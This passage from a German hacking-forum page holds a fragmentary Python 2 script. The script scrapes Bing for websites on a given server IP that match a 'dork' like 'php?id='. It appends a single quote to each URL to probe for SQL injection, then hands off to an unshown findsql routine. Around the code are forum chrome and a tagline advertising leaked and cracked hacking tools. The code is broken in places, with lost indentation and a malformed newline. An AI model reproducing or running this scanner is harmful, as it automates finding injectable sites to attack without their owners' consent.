def getsitesip():

ip=raw_input("Server ip : " )

dork=raw_input("Dork [ex : id= . php?id=] : " )

start=0

end=50000

print "Getting "+ip+" Websites From Bing ... "

while start<=end :

  con = urllib2.urlopen('http://www.bing.com/search?q=ip%3A'+ip+'+'+dork+'&first='+str(start))

  readd=con.read()

  find=re.findall('<div class="sb_tlst"><h3><a href="(.*?)" h="ID',readd)

  start = start+10

  for i in range(len(find)):

   rez=find[i]+"'"

   file.write(rez + 'n')

   os.system('exit')

welcome()

ask1=raw_input("Chose Number : ")

if (ask1=='1'):

getsitesgoogle()

if (ask1=='2') :

getsitesbing()

if (ask1=='3') :

getsitesip()



findsql()


  • darookie gefällt das

Ich "hacke" keine whatsapp oder facebook accounts aber schreibt mich ruhig an was das betrifft dann hab ich was zu lachen. :D

 

 




  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 57 user(s)


    <cerrno>, Alsuna, anonboz, Benutzer, Bot4ng, Botmopp, Bundespolizei, Caudex, chick0n, CHSWEEZY, cooky1, Cranky, Cube, cyberbitch, Diabl0, Dr. Spic, Emalik Xantier, Erikson, Exynos, FalkE, Framerater, Haxlor, Iron, jmPesp, Jozu, kiwitone, L0KK0, Lab511, Lorenzo, mr.blue, MrMongolo, nWostealer, omeralex, Osed28, p0pc0rn, pekelhc, peterslow, ProHex, Pummeluff, QwErTyYyY, Red Hat, rowane, RudolfAntal, Rushkiller1000, Shelled, slivanX, Slixer, smc2014, snowmanx, tehaze, TonySpark, Toolbase, Tortschi, Toskom4n, werwardas, x770s, XR5
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.